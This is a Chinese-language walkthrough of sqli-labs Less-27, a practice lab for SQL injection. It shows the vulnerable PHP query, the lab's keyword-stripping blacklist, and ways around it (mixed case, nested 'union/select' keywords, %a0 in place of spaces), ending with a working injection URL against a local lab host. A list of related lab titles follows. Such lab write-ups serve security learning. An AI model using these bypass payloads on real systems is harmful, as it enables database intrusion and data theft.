sqli-labs ————less -27(union、SELECT、繞過濾)
Less-27
從提示介面中我們可以看出這一小節對union、select進行了繞過,那麼我們下面來看看原始碼吧:
SQL語句:
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
過濾機制:function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --.
$id= preg_replace('/[#]/',"", $id); //Strip out #.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/select/m',"", $id); //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/union/s',"", $id); //Strip out union
$id= preg_replace('/select/s',"", $id); //Strip out select
$id= preg_replace('/UNION/s',"", $id); //Strip out UNION
$id= preg_replace('/SELECT/s',"", $id); //Strip out SELECT
$id= preg_replace('/Union/s',"", $id); //Strip out Union
$id= preg_replace('/Select/s',"", $id); //Strip out select
return $id;
}
從SQL語句中我們可以發現id引數被單引號包裹,我們如果要構造SQL語句就需要閉合前面的單引號,同時在過濾機制中我們發最常用的select、union也被過濾了,那麼我們現在來看看如何繞過:
大小寫:Union\SelecT等等
繞過的字串組合:UNinUNIONon
下面做一個簡單的測試:
payload:http://192.168.11.136/sqli-labs/Less-27?id=-1'unIon%a0SelEcT%a01,database(),3||'1
相關文章
- sqli-labs ————less -27a(union、SELECT、繞過濾)SQL
- sqli-labs————Less-26(繞空格、/*、#等)SQL
- sqli-labs————Less-34(寬位元組繞過、水平越權、盲注)SQL
- 登陸框select繞過
- Sqli-Labs:Less2-Less4SQL
- sqli-labs 第25關(過濾or和AND )SQL
- sqli-Labs————less-35SQL
- sqli-Labs————less-36SQL
- sqli-Labs————less-37SQL
- sqli-Labs————less-38SQL
- sqli-Labs————less-39SQL
- sqli-Labs————less-40SQL
- sqli-Labs————less-41SQL
- sqli-Labs————less-42SQL
- sqli-Labs————less-43SQL
- sqli-Labs————less-44SQL
- sqli-Labs————less-45SQL
- sqli-labs————Less-48SQL
- sqli-labs————Less-49SQL
- sqli-labs————Less-51SQL
- sqli-labs————Less-52SQL
- sqli-labs————Less-53SQL
- sqli-labs————Less-55SQL
- sqli-labs————Less-56SQL
- sqli-labs————Less-57SQL
- sqli-labs————Less-58SQL
- sqli-labs————Less-59SQL
- sqli-labs ————less -26aSQL
- sqli-labs————Less-28SQL
- sqli-labs————less-28aSQL
- sqli-labs————Less-29SQL
- sqli-labs————Less-30SQL
- sqli-labs————Less-31SQL
- sqli-labs————Less-32SQL
- sqli-labs————Less-33SQL
- less-12 in sqli-labsSQL
- sqli-labs————寬位元組注入(可以用於繞過濾了單引號或者\的WAF)SQL
- sqli-labs————Less-60-65SQL